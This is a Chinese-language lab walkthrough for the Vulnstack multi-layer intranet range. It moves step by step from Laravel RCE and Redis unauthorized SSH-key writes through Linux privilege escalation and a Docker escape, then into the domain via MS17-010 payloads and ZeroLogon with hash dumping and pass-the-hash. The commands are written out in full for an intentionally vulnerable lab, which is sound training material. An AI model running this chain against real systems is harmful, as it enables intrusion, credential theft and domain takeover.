Vulnstack内网靶场渗透实战教学文档

靶场概述

Vulnstack是红日安全团队推出的ATT&CK实战系列靶场之一，本靶场模拟了一个多层内网环境，包含DMZ区、第二层网络和第三层网络，涉及多种漏洞利用和渗透技术。

环境配置

靶机信息

• DMZ区 Ubuntu (Web1)

  • IP: 192.168.213.188
  • 需要启动的服务:

    sudo redis-server /etc/redis.conf
    sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
    sudo iptables -F
    

• 第二层网络 Ubuntu (Web2)

  • 需要启动的服务:

    sudo service docker start
    sudo docker start 8e172820ac78
    

• 第三层网络 Windows 7 (PC1)

  • 需要启动通达OA:

    C:\MYOA\bin\AutoConfig.exe
    

账户信息

• 域用户

  • Administrator:Whoami2021
  • whoami:Whoami2021
  • bunny:Bunny2021
  • moretz:Moretz2021

• Ubuntu 1

  • web:web2021

• Ubuntu 2

  • ubuntu:ubuntu

• 通达OA

  • admin:admin657260

外网渗透

1. 信息收集

• 端口扫描发现开放22,80,81,6379端口
• 81端口运行Laravel v8.29.0 (PHP v7.4.14)

2. Laravel Debug模式RCE (CVE-2021-3129)

• 利用工具: laravel-CVE-2021-3129-EXP
• 获取初始shell后发现是Docker环境(172段IP)
• 反弹shell失败，判断为不出网环境

3. Redis未授权访问利用

• 6379端口存在未授权访问
• 写入SSH公钥步骤:

  ssh-keygen -t rsa
  (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
  cat foo.txt | redis-cli -h 192.168.213.170 -p 6379 -x set hello
  redis-cli -h 192.168.213.188
  config set dir /root/.ssh/
  config set dbfilename authorized_keys
  save
  ssh 192.168.213.188
  

4. 提权技术

环境变量提权

• 查找SUID文件:

  find / -perm -u=s -type f 2>/dev/null
  find / -user root -perm -4000 -print 2>/dev/null
  

• 发现/home/jobs/shell脚本存在漏洞
• 利用步骤:

  cd /tmp
  echo "/bin/bash" > ps
  chmod 777 ps
  export PATH=/tmp:$PATH
  cd /home/jobs
  ./shell
  

Docker特权模式逃逸

• 查看磁盘和设备:

  fdisk -l
  ls /dev
  

• 挂载主机磁盘:

  mkdir hello
  mount /dev/sda1 /hello
  

• 写入SSH密钥:

  ssh-keygen -f hello
  chmod 600 hello
  echo '公钥内容' > /hello/home/ubuntu/.ssh/authorized_keys
  ssh -i hello ubuntu@192.168.52.20
  

CVE-2021-3493内核提权

• 影响版本: Ubuntu 20.10/20.04/18.04/16.04/14.04
• 利用步骤:

  vim exploit.c  # 粘贴exp代码
  gcc exploit.c -o exploit
  chmod +x exploit
  ./exploit
  

• EXP地址: CVE-2021-3493

内网渗透

1. 网络拓扑发现

• 发现192.168.93.0/24网段
• 关键主机:
  • 192.168.93.30 [DC] - 域控
  • 192.168.93.40 [PC2] - Windows 7

2. MS17-010漏洞利用

• 检测到两台Windows主机均存在MS17-010漏洞
• 生成DLL载荷:

  msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll
  

3. 域渗透技术

CVE-2020-1472 (ZeroLogon)

• 漏洞检测:

  proxychains python3 zerologon_tester.py DC 192.168.93.30
  

• 漏洞利用:

  proxychains python3 cve-2020-1472-exploit.py DC 192.168.93.30
  

• 导出域控Hash:

  proxychains python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass
  

• 使用Hash登录:

  use exploit/windows/smb/psexec
  set SMBUser administrator
  set SMBPass aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
  set payload windows/meterpreter/bind_tcp
  set rhost 192.168.93.30
  run
  

恢复域控Hash

1. 导出注册表:

   reg save HKLM\SYSTEM system.save
   reg save HKLM\SAM sam.save
   reg save HKLM\SECURITY security.save
   

2. 下载到本地分析:

   python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
   

3. 恢复原始Hash:

   proxychains python3 reinstall_original_pw.py DC 192.168.93.30 7fd0cca5eafe480f617b04039bbf115c
   

总结

本靶场涵盖了从外网渗透到内网横向移动的完整攻击链，涉及的主要技术点包括:

1. Web应用漏洞利用(Laravel RCE)
2. 中间件未授权访问(Redis)
3. Linux系统提权(环境变量、内核漏洞)
4. Docker逃逸技术
5. 内网信息收集与横向移动
6. Windows域渗透(ZeroLogon)

关键注意事项:

• 利用ZeroLogon后必须恢复域控原始Hash，否则会导致脱域
• 内网渗透时注意设置正确的路由和代理
• 针对不同环境选择合适的提权方式